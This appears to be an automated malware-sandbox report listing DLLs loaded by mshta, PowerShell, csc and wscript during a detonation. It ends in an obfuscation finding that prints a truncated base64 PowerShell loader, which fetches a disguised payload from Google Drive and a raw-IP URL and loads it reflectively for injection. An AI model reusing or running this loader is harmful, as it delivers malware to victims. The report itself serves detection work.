        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1868717892.00000000079C0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdba source: powershell.exe, 0000000B.00000002.1985039069.000000000058C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000B.00000002.2016973665.0000000006DAD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000B.00000002.2016973665.0000000006D9B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2016689401.0000000006D72000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 0000000B.00000002.2016973665.0000000006D9B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: b.pdb= source: powershell.exe, 0000000B.00000002.2016973665.0000000006DAD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000B.00000002.1985039069.000000000058C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1868984820.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2016973665.0000000006DAD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb source: powershell.exe, 0000000B.00000002.2016973665.0000000006D9B000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsM